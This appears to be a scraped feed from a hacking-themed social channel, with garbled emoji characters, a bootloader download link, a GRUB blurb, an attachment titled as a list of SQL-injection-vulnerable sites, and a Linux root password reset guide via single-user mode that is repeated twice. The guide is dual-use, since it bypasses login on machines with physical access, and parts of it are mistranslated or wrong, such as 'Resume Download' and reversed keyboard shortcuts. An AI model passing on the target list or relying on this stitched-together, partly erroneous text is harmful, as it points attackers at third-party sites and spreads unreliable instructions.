https://pkgs.org/download/gummiboot β (avaible for pc & androids apk...)
π¦There is More But Those Top Rated in 2020
Enjoyβ€οΈππ»
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
www.gnu.org
GNU GRUB
GNU GRUB is a Multiboot boot loader. It was derived from GRUB, the GRand Unified Bootloader, which was originally designed and implemented by Erich Stefan Boleyn.
List Of Vulnerable SQL Injection Sites.pdf
155.2 KB
Vulnerable SQL Injection Sites
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Reset Linux Password :
What to do if you forget your Linux login password ?
1οΈβ£If you do not have other administrative accounts and, having forgotten the password of the Linux account, you cannot enter the operating system, then to reset the password we need single-user mode .
2οΈβ£In single-user mode, credentials (login, password) are not requested for login, while the logged in user has superuser rights. In this mode, using the familiar passwd command , you can set a new password.
π¦The algorithm in all Linux distributions is similar:
1>GRUB Bootloader Interruption
2>Adding a boot option that includes single-user mode
3> Resume Download
4>Password change with passwd command
5>Reboot in normal mode
3οΈβ£Please note that the changes made in the second step (changing boot options) are temporary - they affect only one subsequent download. Therefore, when rebooting, in the fifth step, you do not need to do anything - the system will turn on in normal mode.
4οΈβ£To move to the end of the line and to the beginning of the line (in the second step), use the keyboard shortcuts Ctrl + a and Ctrl + e .
5οΈβ£Although the root password reset algorithm is similar, but different distributions may have their own nuances, consider them in more detail.
Note for UEFI : If you use UEFI instead of GRUB, then see also this article , it tells how to change the boot options in this case.
Share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β
π¦Reset Linux Password :
What to do if you forget your Linux login password ?
1οΈβ£If you do not have other administrative accounts and, having forgotten the password of the Linux account, you cannot enter the operating system, then to reset the password we need single-user mode .
2οΈβ£In single-user mode, credentials (login, password) are not requested for login, while the logged in user has superuser rights. In this mode, using the familiar passwd command , you can set a new password.
π¦The algorithm in all Linux distributions is similar:
1>GRUB Bootloader Interruption
2>Adding a boot option that includes single-user mode
3> Resume Download
4>Password change with passwd command
5>Reboot in normal mode
3οΈβ£Please note that the changes made in the second step (changing boot options) are temporary - they affect only one subsequent download. Therefore, when rebooting, in the fifth step, you do not need to do anything - the system will turn on in normal mode.
4οΈβ£To move to the end of the line and to the beginning of the line (in the second step), use the keyboard shortcuts Ctrl + a and Ctrl + e .
5οΈβ£Although the root password reset algorithm is similar, but different distributions may have their own nuances, consider them in more detail.
Note for UEFI : If you use UEFI instead of GRUB, then see also this article , it tells how to change the boot options in this case.
Share usβ€οΈππ»
written by
@UndercodeTesting
@UndercodeSecurity
@UndercodeHacking
β β β Uππ»βΊπ«6π¬πβ β β β